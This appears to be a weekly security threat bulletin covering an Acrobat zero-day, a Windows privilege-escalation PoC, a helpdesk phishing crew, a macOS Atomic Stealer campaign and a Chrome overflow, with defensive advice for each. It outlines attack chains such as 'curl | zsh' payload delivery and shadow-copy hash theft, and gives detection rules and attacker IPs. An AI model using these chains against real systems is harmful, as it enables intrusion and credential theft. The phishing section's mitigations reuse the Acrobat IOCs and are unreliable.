Weekly Threat Bulletin – April 15th, 2026

Acrobat Reader Zero-Day Exploited in the Wild for Many Months

A zero-day vulnerability in Adobe Acrobat Reader has been actively exploited since November 2025, and potentially earlier, as discovered by security researcher Haifei Li through the EXPMON system. Malicious PDF files deliver an obfuscated JavaScript payload that collects system information, including language settings, OS version, Adobe Reader version, and the PDF's local path, transmitting this data to attacker-controlled remote servers (169.40.2.68 and 188.214.34.20). This script is capable of delivering additional remote code execution or sandbox escape exploits, though during analysis, the server did not provide an exploit, suggesting an advanced fingerprinting attack. Malware researcher Giuseppe Massaro noted that the exploit-carrying PDFs display Russian-language decoys related to gas supply disruptions, indicating a targeting focus on Russian-speaking entities within government, energy, or infrastructure sectors. The vulnerability affects the latest Acrobat Reader version, and while Adobe has been notified, a fix is not yet available. Until a patch is released, users should avoid opening untrusted PDF files, and security teams are advised to block the identified attacker IP addresses, filter HTTP/HTTPS traffic containing the "Adobe Synchronizer" User Agent string, and monitor for "AdobeCollabSync.exe" making external network connections or PDF JavaScript calling "RSS.addFeed()" or "util.readFileIntoStream()" APIs.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Add the IP addresses 169.40.2.68 and 188.214.34.20 to the network firewall and web proxy blocklists.
• Create a rule on the web proxy or network firewall to block all outbound HTTP/HTTPS requests containing the User-Agent string 'Adobe Synchronizer'.
• Create a detection rule in your Endpoint Detection and Response (EDR) or Security Information and Event Management (SIEM) system to alert when the process 'AdobeCollabSync.exe' initiates an outbound network connection.
• Configure endpoint security tools or automated malware analysis sandboxes to detect and alert on PDF files that execute JavaScript containing the 'RSS.addFeed()' or 'util.readFileIntoStream()' API calls.
• Monitor Adobe security bulletins for a patch addressing the zero-day vulnerability and prepare for immediate, prioritized deployment to all systems with Adobe Acrobat Reader once it is released.

Compliance Best Practices

• Develop and implement a recurring security awareness training program that specifically educates users on the dangers of opening unsolicited attachments, including PDF files, from unknown or untrusted sources.
• Implement a policy to disable JavaScript execution in Adobe Acrobat Reader across all endpoints through Group Policy (GPO) or a similar endpoint configuration management tool.
• Implement a network egress filtering policy that denies all outbound traffic by default and only allows connections to approved services and destinations required for business operations.
• Deploy an automated sandboxing solution for email attachments and web downloads to analyze suspicious files, such as PDFs, in an isolated environment to detect and block malicious behavior before it reaches an endpoint.
• Enhance Endpoint Detection and Response (EDR) policies to detect and alert on anomalous behavior from common document applications like Adobe Acrobat Reader, such as spawning unexpected processes or making network connections to unusual domains.

BlueHammer: Windows Zero-Day Exploit Leaked

A proof-of-concept (PoC) exploit for an unpatched Windows local privilege escalation vulnerability, dubbed BlueHammer, has been publicly released on GitHub by "Chaotic Eclipse and Nightmare Eclipse," affecting patched Windows 10, 11, and Windows Server systems. This zero-day allows a low-privileged user to escalate to NT AUTHORITY\\SYSTEM or administrator by chaining legitimate Windows features: it forces Microsoft Defender to create a Volume Shadow Copy, pauses Defender, accesses sensitive registry hive files from the snapshot to extract NTLM password hashes, changes a local Administrator's password, duplicates the security token to achieve SYSTEM integrity, and creates a malicious temporary Windows Service, ultimately restoring the original password hash. While Microsoft's current Defender signature for the exploit is easily bypassed, organizations should implement behavioral detection by monitoring for Volume Shadow Copy enumeration from user-space processes, unexpected Cloud Files sync root registrations, low-privileged accounts spawning Windows services, and rapid Administrator password changes and restorations. Enforcing least privilege and restricting user account interaction with Cloud Files APIs and VSS interfaces are also critical, as the exploit requires local access and is highly susceptible to rapid weaponization by threat actors.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Create a detection rule in your SIEM or EDR to alert on the execution of Volume Shadow Copy tools (e.g., vssadmin.exe) by non-administrative user accounts.
• Implement a SIEM or EDR detection rule to alert on the creation of a new Windows Service (Event ID 4697 or 7045) by any account that is not a pre-approved administrator or system account.
• Configure endpoint monitoring to detect and alert on the registration of new Cloud Files sync roots, particularly when initiated by standard user processes.
• Create a correlation rule in your SIEM to alert when a local administrator password change (Event ID 4723) is followed by another password change for the same account within a short time window (e.g., 5 minutes).

Compliance Best Practices

• Initiate a project to audit and remove all unnecessary local administrator privileges from standard user accounts across the enterprise.
• Use Group Policy Objects (GPO) or another endpoint configuration management tool to restrict standard user accounts from executing Volume Shadow Copy Service (VSS) administration tools and accessing VSS APIs.
• Implement an application control solution, such as Windows Defender Application Control or AppLocker, to restrict the execution of unauthorized applications and scripts from user-writable locations.
• Investigate and implement technical controls to restrict standard user accounts from interacting with the Windows Cloud Files API where it is not required for business functions.

'Several Dozen' High-Value Corporations Hit by New Extortion Crew in Helpdesk Phishing Spree

A new extortion crew, tracked by Google Threat Intelligence Group as UNC6783, has targeted "several dozen high-value" corporations using sophisticated phishing and helpdesk social-engineering techniques. This financially motivated group compromises call centers and Business Process Outsourcers (BPOs) to leverage stolen employee credentials for access to customer IT environments. They also directly target corporate support and helpdesk staff through live chat, directing them to malicious, spoofed Okta login pages, often using domain patterns such as `<org>[.]zendesk-support<##>[.]com`. UNC6783 employs a phishing kit to bypass multi-factor authentication by stealing clipboard contents and enrolling their own devices for persistent access, and they distribute remote access malware via fake security software updates. Following data exfiltration, ransom notes are delivered using Proton Mail accounts. There is a potential link between UNC6783 and the "Mr. Raccoon" persona, who claimed responsibility for a recent breach of Adobe through an Indian BPO, reportedly compromising 13 million support tickets, 15,000 employee records, and other sensitive internal documents.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Configure the corporate web filter and DNS sinkhole to block any domains matching the pattern `*zendesk-support*.com` that are not explicitly authorized.
• Conduct an immediate security briefing for all helpdesk, support staff, and employees of BPO partners to warn them of the active social engineering campaign using live chat to direct users to fake Okta login pages.
• Query identity provider (e.g., Okta) and SIEM logs for instances of a user account successfully authenticating from a new or anomalous location, immediately followed by the enrollment of a new multi-factor authentication (MFA) device.
• Add the IP addresses 169.40.2.68 and 188.214.34.20 to the network firewall's deny list.
• Create a rule in the web proxy to block all outbound HTTP/HTTPS requests containing the User-Agent string 'Adobe Synchronizer'.
• Use Group Policy (GPO) or an endpoint management system to deploy a configuration change that disables JavaScript execution in all corporate installations of Adobe Reader.

Compliance Best Practices

• Initiate a project to migrate all user accounts, especially for privileged and helpdesk roles, from phishable MFA methods (like SMS and push notifications) to phishing-resistant MFA, such as FIDO2-compliant hardware security keys.
• Establish a formal third-party risk management program to review the security posture of all BPOs and vendors, enforce principles of least privilege for their accounts, and include security requirements in all contracts.
• Deploy an application whitelisting or application control solution on endpoints to restrict software execution to only approved applications, preventing the launch of unauthorized remote access tools.
• Enhance the security awareness training program to include recurring, interactive modules focused on identifying sophisticated social engineering, MFA bypass attacks, and business process compromise scenarios.
• Implement network segmentation to create isolated enclaves for third-party and BPO access, strictly limiting their connectivity to only the specific hosts and services required for their duties.
• Develop and tune a high-fidelity automated alert in the SIEM that triggers when a new MFA device is enrolled for a user account within a short time window following a login from a high-risk or anomalous source (e.g., new country, unfamiliar ASN).

New macOS Atomic Stealer Campaign Uses Script Editor in ClickFix Attack

A new campaign targets macOS users with Atomic Stealer (AMOS) malware, leveraging a variation of the ClickFix attack that abuses the built-in Script Editor application. Observed by security researchers at Jamf, this method involves luring victims to fake Apple-themed websites that offer disk space cleanup guides. These malicious pages utilize the `applescript://` URL scheme to automatically launch Script Editor with pre-filled, obfuscated code. This code executes a `curl | zsh` command, which downloads and runs a script directly in system memory. The script then decodes a base64 + gzip payload, downloads a Mach-O binary to `/tmp/helper`, removes its security attributes, makes it executable, and runs it. This final payload is the Atomic Stealer, a commodity malware-as-a-service known for targeting sensitive data such as Keychain information, desktop files, browser cryptocurrency wallet extensions, autofill data, passwords, cookies, stored credit cards, and system information. This technique effectively bypasses macOS Tahoe 26.4's protections against ClickFix attacks by avoiding direct Terminal interaction. AMOS also incorporated a backdoor component last year for persistent access. Mac users are advised to treat Script Editor prompts as high-risk and to rely solely on official Apple documentation for troubleshooting.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Configure your Endpoint Detection and Response (EDR) tool to generate a high-severity alert for any process execution of `Script Editor` that spawns a shell process (like `zsh` or `bash`) which then initiates a network connection using `curl` or `wget`.
• Create a detection rule in your EDR or SIEM to alert on the sequence of a file being created in the `/tmp` directory, followed by the execution of `xattr -c` on that file, and its subsequent execution.
• Immediately issue a security advisory to all employees, especially macOS users, warning them not to approve any browser prompts to open 'Script Editor' and to be suspicious of websites offering system cleanup guides that are not from official Apple sources.
• Investigate and implement controls through your web proxy or browser management policies to block or alert on the use of the `applescript://` URL scheme initiated from external websites.

Compliance Best Practices

• Develop and deploy an application control or allowlisting policy for macOS endpoints to prevent the execution of unauthorized applications and scripts, particularly from temporary or user-writable directories like `/tmp`.
• Update the security awareness training program to include specific modules on social engineering attacks targeting macOS, demonstrating how attackers abuse trusted system utilities like Script Editor through malicious web links and copy-paste commands.
• For non-developer user groups, create and enforce a configuration policy using a Mobile Device Management (MDM) solution to restrict or disable user access to developer tools and scripting environments, including Script Editor.
• Conduct a comprehensive review of user account privileges on macOS endpoints, ensuring that standard users do not have administrative rights and cannot install software or execute scripts that modify system-level files and settings.

Google Chrome - CVE-2026-5858

A heap-based buffer overflow vulnerability, identified as CVE-2026-5858, exists within the WebML component of Google Chrome. This flaw, rated with a CVSS v3.1 score of 8.8, stems from the WebML implementation's failure to validate memory boundaries when processing operations triggered by a specially crafted HTML page. An attacker can exploit this vulnerability remotely with low complexity and no required privileges, though user interaction (visiting a malicious page) is necessary, to achieve arbitrary code execution within the renderer process and potentially gain privileged rights. While not actively exploited, a patch is available, and affected versions include Google Chrome prior to 147.0.7727.55 on Linux and prior to 147.0.7727.55/56 on Windows/Mac. Resolution requires updating Google Chrome to version 147.0.7727.55 or higher for Linux, and 147.0.7727.55/56 or higher for Windows/Mac.

Severity: Critical

Threat Details and IOCs

Mitigation Advice

• Force update all company-managed Windows and macOS devices to Google Chrome version 147.0.7727.56 or newer. Force update all company-managed Linux devices to Google Chrome version 147.0.7727.55 or newer.
• Use your endpoint management system to check for and enforce the latest security updates for Microsoft Edge on all company Windows and macOS devices.
• Use asset inventory tools to identify desktop applications built on the Electron framework and check with their respective vendors for security updates related to the underlying Chromium engine.
• Send a security bulletin to all employees advising them to be extra cautious with links from untrusted sources and to report any suspicious websites, as this vulnerability is triggered by visiting a malicious page.
• Scan all endpoints to identify and update or uninstall unmanaged Chromium-based browsers, such as Brave and Opera, to their latest versions.

Compliance Best Practices

• Implement or enhance an automated patch management solution to ensure timely deployment of security updates for all web browsers and third-party applications across all endpoints.
• Evaluate and pilot a Remote Browser Isolation (RBI) solution to render web content in a secure, remote container, preventing browser-based exploits from reaching corporate endpoints.
• Develop and implement an application allowlisting policy to restrict the execution of unauthorized software, reducing the attack surface from unmanaged or vulnerable applications.
• Enhance the ongoing security awareness training program with specific, recurring modules on identifying malicious links and the dangers of navigating to untrusted websites.